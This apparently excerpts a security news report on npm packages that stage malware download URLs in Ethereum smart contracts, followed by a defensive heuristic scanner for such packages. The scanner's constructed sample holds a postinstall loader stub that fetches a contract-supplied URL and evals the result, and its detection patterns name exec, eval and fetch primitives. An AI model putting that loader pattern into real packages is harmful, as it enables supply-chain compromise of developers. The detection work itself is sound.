
"The software supply chain security firm said the libraries are part of a larger and sophisticated campaign impacting both npm and GitHub, tricking unsuspecting developers into downloading and running them. While the packages themselves make no effort to conceal their malicious functionality, ReversingLabs noted that the GitHub projects that imported these packages took pains to make them look credible. As for the packages themselves, the nefarious behavior kicks in once either of them is used or included in some other project,"
"Although this is par for the course when it comes to malware downloaders, where it stands apart is the use of Ethereum smart contracts to stage the URLs hosting the payload - a technique reminiscent of EtherHiding. The shift underscores the new tactics that threat actors are adopting to evade detection. Further investigation into the packages has revealed that they are referenced in a network of GitHub repositories claiming to be a solana-trading-bot-v2 that leverages"
Two npm packages uploaded in July 2025 used Ethereum smart contracts to conceal malicious commands and install downloader malware on compromised systems. The libraries activated when included in other projects and fetched a next-stage payload from an attacker-controlled server. The campaign affected both npm and GitHub and relied on GitHub projects crafted to appear credible in order to trick developers into downloading and running the packages. Rather than hard-coding the payload location, the packages read it from a smart contract, so the URL lives on-chain, a technique reminiscent of EtherHiding that reflects a shift toward on-chain evasion tactics. The packages were referenced by repositories posing as a solana-trading-bot-v2, and the associated GitHub accounts are no longer available.
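As an added example (not code from the article or from ReversingLabs), the check below triages an npm package for the pattern described above: an Ethereum client used to read a payload location, combined with download or execution primitives and wired to an install-time lifecycle script. The regexes, the signal names and the verdict thresholds are assumptions of this example, and the sample manifest and loader stub are constructed; hits are leads for manual review, not proof of malice.

```javascript
// Heuristic static triage for npm packages that stage payload URLs on-chain.
// Signal patterns are this example's own assumptions, not a published ruleset.
const SIGNALS = [
  { id: 'chain-client',  re: /\b(?:require\(\s*['"](?:ethers|web3)['"]\s*\)|from\s+['"](?:ethers|web3)['"])/ },
  { id: 'contract-read', re: /\bnew\s+(?:ethers\.)?Contract\s*\(|\.call\s*\(\s*\{?\s*to\s*:/ },
  { id: 'remote-fetch',  re: /\b(?:fetch|axios\.get|https?\.get|https?\.request)\s*\(/ },
  { id: 'code-exec',     re: /\b(?:child_process|exec(?:Sync)?|spawn(?:Sync)?|eval|new\s+Function)\b/ },
  { id: 'drop-to-disk',  re: /\bwriteFileSync?\s*\(/ },
];
// Scripts npm runs automatically during install, i.e. without the developer calling anything.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Return the ids of the signals present in one source file.
function scanSource(code) {
  return SIGNALS.filter((s) => s.re.test(code)).map((s) => s.id);
}

// Return the lifecycle hooks defined in a package.json object.
function lifecycleHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return LIFECYCLE.filter((k) => typeof scripts[k] === 'string');
}

// Combine per-file signals: a chain client plus a fetch or execution primitive is
// the on-chain-staging pattern; an auto-run hook raises the verdict further.
function assess(manifest, sources) {
  const hits = new Set();
  for (const code of Object.values(sources)) scanSource(code).forEach((h) => hits.add(h));
  const hooks = lifecycleHooks(manifest);
  const staged = hits.has('chain-client') && (hits.has('remote-fetch') || hits.has('code-exec'));
  let verdict = 'low';
  if (staged) verdict = hooks.length ? 'high' : 'medium';
  else if (hooks.length && hits.has('code-exec')) verdict = 'medium';
  return { verdict, hits: [...hits].sort(), hooks };
}

// Constructed sample: a plausible-looking manifest and a loader stub with placeholder
// contract details (ADDR/ABI are not real values).
const SAMPLE_MANIFEST = { name: 'example-trading-helper', version: '1.0.0',
  scripts: { postinstall: 'node setup.js' } };
const SAMPLE_SOURCES = {
  'setup.js': [
    "const { ethers } = require('ethers');",
    "const c = new ethers.Contract(ADDR, ABI, provider); // ADDR/ABI: placeholders",
    "c.getUrl().then((u) => fetch(u)).then((r) => r.text()).then((s) => eval(s));",
  ].join('\n'),
};

console.log(JSON.stringify(assess(SAMPLE_MANIFEST, SAMPLE_SOURCES)));
```

Run it against an unpacked tarball by reading each .js file into the `sources` map and package.json into `manifest`; a `high` verdict should trigger manual review before the package is installed anywhere.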
Read at The Hacker News